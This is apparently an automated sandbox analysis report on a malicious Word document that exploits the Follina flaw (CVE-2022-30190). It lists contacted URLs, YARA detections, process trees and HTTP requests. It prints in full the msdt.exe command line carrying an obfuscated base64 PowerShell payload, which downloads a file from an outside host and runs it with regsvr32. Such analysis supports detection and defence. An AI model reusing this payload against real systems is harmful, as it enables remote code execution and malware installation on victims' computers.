        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://invites.office.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://lifecycle.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://login.windows.local
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://management.azure.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://management.azure.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://messaging.engagement.office.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://messaging.office.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://ncus.contentsync.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://officeapps.live.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://onedrive.live.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://osi.office.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://otelrules.azureedge.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office365.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://roaming.edog.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://settings.outlook.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://tasks.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.32.185.177Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.32.185.177If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMTIf-None-Match: "1701-5e0db72a43821"Connection: Keep-Alive
        Source: DiagPackage.dll.mui.9.drStatic PE information: No import functions for PE file found
        Source: DiagPackage.dll.9.drStatic PE information: No import functions for PE file found
        Source: 00000009.00000002.729808859.0000000002830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.729847278.0000000002838000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.729643897.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.730773001.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: Process Memory Space: msdt.exe PID: 6552, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: DiagPackage.dll.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: doc1712.docxVirustotal: Detection: 23%
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP"
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP"
        Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\Fros.poster
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP"
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP"Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
        Source: doc1712.LNK.0.drLNK file: ..\..\..\..\..\Desktop\doc1712.docx
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{2CAA8033-7991-4565-AB80-E2DDAE691AB0} - OProcSessId.datJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
        Source: classification engineClassification label: mal72.expl.evad.winDOCX@17/32@0/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.cmdline
